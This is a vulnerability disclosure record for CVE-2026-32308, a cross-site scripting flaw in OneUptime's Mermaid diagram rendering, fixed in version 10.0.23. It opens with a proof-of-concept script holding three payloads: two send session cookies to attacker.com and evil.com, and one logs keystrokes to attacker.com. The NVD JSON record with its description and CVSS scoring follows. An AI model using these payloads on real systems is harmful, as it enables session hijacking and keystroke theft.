CVE-2026-32308

// CVE-2026-32308 PoC - OneUptime Mermaid XSS // Attack vector: Insert malicious Mermaid code in any Markdown field const maliciousMermaid = ` graph TD A["Click me for more info"] --> B["Processing..."] click A "javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)" style A fill:#f00,color:#fff `; // XSS Payload for stealing session cookies const xssPayload = ` graph TD A["Incident Report"] --> B["Click to view details"] click B "javascript:document.location='https://evil.com/log?c='+document.cookie" `; // Alternative payload - Keylogger const keyloggerPayload = ` sequenceDiagram participant U as User participant A as Attacker U->>A: Click to continue click U "javascript:document.onkeypress=function(e){fetch('https://attacker.com/k?'+e.key)}" `; // The PoC demonstrates that any Mermaid click directive with javascript: prefix // will execute arbitrary JavaScript when the user clicks on the node. // This works because OneUptime renders Mermaid with securityLevel: "loose" // and injects the SVG via innerHTML without sanitization.

{"cve": {"id": "CVE-2026-32308", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:42.147", "lastModified": "2026-03-17T20:08:07.103", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OneUptime is a solution for monitoring and managing online services. Prior to 10.0.23, the Markdown viewer component renders Mermaid diagrams with securityLevel: \"loose\" and injects the SVG output via innerHTML. This configuration explicitly allows interactive event bindings in Mermaid diagrams, enabling XSS through Mermaid's click directive which can execute arbitrary JavaScript. Any field that renders markdown (incident descriptions, status page announcements, monitor notes) is vulnerable. This vulnerability is fixed in 10.0.23."}, {"lang": "es", "value": "OneUptime es una solución para monitorear y gestionar servicios en línea. Antes de la versión 10.0.23, el componente visor de Markdown renderiza diagramas Mermaid con securityLevel: 'loose' e inyecta la salida SVG a través de innerHTML. Esta configuración permite explícitamente enlaces de eventos interactivos en los diagramas Mermaid, lo que habilita XSS a través de la directiva 'click' de Mermaid que puede ejecutar JavaScript arbitrario. Cualquier campo que renderice markdown (descripciones de incidentes, anuncios de páginas de estado, notas de monitores) es vulnerable. Esta vulnerabilidad se corrige en la versión 10.0.23."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hackerbay:oneuptime:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.23", "matchCriteriaId": "AF2F89C2-1AB8-4611-9B0B-A4CFA02C807E"}]}]}], "references": [{"url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-wvh5-6vjm-23qh", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}